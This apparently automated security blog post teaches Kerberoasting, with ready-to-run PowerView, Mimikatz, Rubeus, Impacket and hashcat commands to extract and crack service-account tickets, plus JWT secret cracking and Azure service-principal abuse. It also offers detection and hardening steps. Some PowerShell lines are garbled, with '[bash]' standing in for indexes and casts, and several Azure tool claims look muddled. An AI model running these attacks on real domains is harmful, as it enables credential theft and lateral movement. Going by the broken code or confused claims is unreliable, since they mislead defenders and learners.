Breaking Into Active Directory: The Kerberoasting Attack That Bypasses Most Defenses + Video

Listen to this Post

Featured Image

Introduction:

Kerberoasting is a post-exploitation attack technique that targets Service Principal Names (SPNs) in Active Directory to crack service account passwords offline. By requesting a Ticket Granting Service (TGS) ticket for any service running under a user account, an attacker extracts the encrypted ticket and cracks the hash using brute-force or dictionary attacks—completely bypassing account lockout policies and evading most traditional detection mechanisms.

Learning Objectives:

  • Understand how Kerberoasting exploits Kerberos authentication in Active Directory environments.
  • Execute a Kerberoasting attack using native Windows tools and Impacket on Linux.
  • Implement detection and mitigation strategies, including strong service account passwords and Group Managed Service Accounts (gMSA).

You Should Know:

1. Extracting TGS Tickets with PowerShell and Mimikatz

This section expands on the core concept: an attacker with domain user credentials can request TGS tickets for any SPN. The `Get-DomainUser` function from PowerView (part of PowerSploit) enumerates users with SPNs, then `Request-SPNTicket` extracts the ticket for offline cracking.

Step‑by‑step guide:

  1. From a domain-joined Windows machine, launch PowerShell as a non‑admin user.

2. Import PowerView: `Import-Module .\PowerView.ps1`

  1. Find all users with SPNs: `Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname`
    4. Request TGS ticket for a target: `Request-SPNTicket -SPN “http/sql01.lab.local” -OutputFormat Hashcat` (saves hash to a file).

5. Alternatively, use Mimikatz: `kerberos::ask /target:http/sql01.lab.local`

6. Export all tickets: `kerberos::list /export`

  1. Convert the `.kirbi` file to Hashcat format using `kirbi2john.py` or tgsrepcrack.py.

Linux equivalent using Impacket:

 Install Impacket
pip3 install impacket

Request TGS and dump hash
impacket-GetUserSPNs -request -dc-ip 10.0.0.1 lab.local/standarduser:Password123 -outputfile hashes.kerberoast

Crack with hashcat (mode 13100)
hashcat -m 13100 -a 0 hashes.kerberoast rockyou.txt
  1. Cracking TGS Hashes with Hashcat and John the Ripper

Once the TGS ticket hash (encrypted with the service account’s NTLM hash) is obtained, it can be cracked offline because service accounts often have weak, human‑memorable passwords.

Step‑by‑step guide:

  1. Verify the hash format – Kerberoast hashes start with $krb5tgs$.

2. Use Hashcat mode 13100 for TGS-REP hashes:

hashcat -m 13100 -a 3 hash.txt ?a?a?a?a?a?a?a?a  brute‑force 8‑char
hashcat -m 13100 -a 0 hash.txt wordlist.txt --force

3. For John the Ripper:

john --format=krb5tgs --wordlist=rockyou.txt hash.txt

4. Optimize cracking by using rules: `–rules=best64` in Hashcat.
5. If the hash doesn’t crack, check RC4 vs AES encryption – force RC4 by setting the service account’s `msDS-SupportedEncryptionTypes` to 0.
6. On Windows, use `rubeus.exe` to perform the entire attack in one command:

Rubeus.exe kerberoast /outfile:hashes.txt /tgtdeleg
  1. Detecting Kerberoasting via Event Logs and Network Traffic

Proactive defense relies on identifying abnormal TGS requests. Attackers often request many tickets in a short time from a single host.

Step‑by‑step guide for blue teams:

  1. Enable Kerberos service logging (Event ID 4769) – “A Kerberos service ticket was requested”.
  2. Filter for events where `Ticket Encryption Type` is 0x17 (RC4) – suspicious because modern environments should use AES.

3. Use PowerShell to query events:

Get-WinEvent -FilterHashtable @{LogName='Security';ID=4769} | Where-Object {$_.Properties[bash].Value -eq 0x17}

4. Look for anomalies: a single user requesting tickets for dozens of unique SPNs within minutes.

5. On Linux (Sysmon for Linux or Zeek):

 Zeek script to detect Kerberoasting (extract kerberos.log)
zeek -C -r capture.pcap kerberos
cat kerberos.log | grep -E "request_type|tgs"

6. Use SIEM rules: detect `EventID 4769` with `TicketOptions` not containing `0x40810000` (forwardable) and high frequency.

  1. Mitigation: Strong Passwords, gMSA, and Managed Service Accounts

The most effective fix eliminates weak service account passwords and prevents RC4 usage.

Step‑by‑step hardening guide:

1. Enumerate all service accounts with SPNs:

Get-ADUser -Filter {ServicePrincipalName -like ""} -Properties ServicePrincipalName, PasswordLastSet, Enabled

2. Change passwords to 25+ random characters (use `-Random` in PowerShell):

$NewPass = -join ((33..126) | Get-Random -Count 25 | % {[bash]$_})
Set-ADAccountPassword -Identity svc_sql -NewPassword (ConvertTo-SecureString $NewPass -AsPlainText -Force)

3. Migrate to Group Managed Service Accounts (gMSA) where possible – gMSA passwords are 120+ random characters, rotated automatically:

 Create gMSA (requires Domain Controller 2012+)
New-ADServiceAccount -Name gmsa_sql -DNSHostName sql01.lab.local -ServicePrincipalNames "http/sql01"
Add-ADComputerServiceAccount -Identity SQL01 -ServiceAccount gmsa_sql

4. Disable RC4 encryption for Kerberos via Group Policy: Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → “Network security: Configure encryption types allowed for Kerberos” → only enable AES128/AES256.

5. Regularly audit SPNs using:

 Linux with ldapsearch
ldapsearch -x -H ldap://dc.lab.local -D "cn=user,dc=lab,dc=local" -w pass -b "dc=lab,dc=local" "(servicePrincipalName=)" servicePrincipalName

5. Simulating the Attack in a Lab Environment

To truly understand Kerberoasting, build a safe lab with VirtualBox and Windows Server 2019/2022.

Step‑by‑step lab setup:

  1. Install Windows Server 2019 as Domain Controller (IP 10.0.0.1).
  2. Create a domain lab.local. Add a Windows 10/11 client (join domain).
  3. Create a service user `svc_iis` with password `P@ssw0rd` (weak for testing) and register an SPN:
    setspn -A HTTP/webserver.lab.local lab\svc_iis
    
  4. On the client as a normal domain user, run:
    Rubeus.exe kerberoast /spn:HTTP/webserver.lab.local /format:hashcat
    
  5. Copy the hash to a Kali Linux VM and crack with hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt.
  6. If successful, use the cracked password to authenticate as `svc_iis` and attempt a pass‑the‑hash or lateral movement.

  7. API Security Parallel: JWT Token Cracking vs. Kerberos TGS

Just as TGS tickets rely on weak service account passwords, JSON Web Tokens (JWTs) often use weak secrets. Attackers can brute‑force the HS256 secret offline after capturing a token.

Step‑by‑step guide to crack JWT secrets:

  1. Capture a JWT (from browser dev tools or Burp Suite).

2. Use `jwt_tool` or `crackjwt`:

git clone https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c -C -d rockyou.txt

3. For automation, use `hashcat -m 16500` (JWT) with the same wordlists.
4. Mitigation: Use RS256 (asymmetric) instead of HS256, rotate secrets, and store them in vaults like HashiCorp Vault.

7. Cloud Hardening: Azure AD Kerberoasting Equivalent

Azure AD and hybrid environments have a similar attack called “Azure Kerberoasting” or “SPN injection” using the `Set-AzureADServicePrincipal` cmdlet.

Step‑by‑step Azure AD testing:

1. Enumerate Azure AD service principals with PowerShell:

Connect-AzureAD
Get-AzureADServicePrincipal | Select-Object DisplayName, ServicePrincipalNames

2. Request a ticket for an on‑prem SPN synced to Azure AD Connect – the same TGS hash can be retrieved via `Invoke-Kerberoast` from the `StormSpotter` toolkit.
3. For cloud‑only, abuse `keyCredential` upload to add your own public key to a service principal (Azure AD “Golden SAML” variant).
4. Use `roadrecon` (Azure AD reconnaissance) to find misconfigured app registrations with weak secrets.

What Undercode Say:

  • Kerberoasting remains one of the most reliable AD attacks because it requires only a domain user account and no elevated privileges. Many organizations still neglect service account password complexity.
  • Detection is possible but often misconfigured – most SIEMs lack baseline tuning for 4769 events, and RC4 is still enabled by default. Shift to AES and gMSA to break the attack chain.

Prediction:

As organizations move to hybrid identities and cloud Kerberos (Azure AD Kerberos for file shares), attackers will adapt Kerberoasting techniques to cloud service principals. Expect tooling like “CloudKerberoast” to emerge within 12 months, targeting poorly secured app registrations and managed identities. Defenders must enforce FIDO2 or certificate‑based authentication for service accounts and adopt Continuous Access Evaluation (CAE) to limit token lifetime. The golden era of offline TGS cracking is not over—it’s merely shifting to the cloud.

▶️ Related Video (86% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Infosec Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky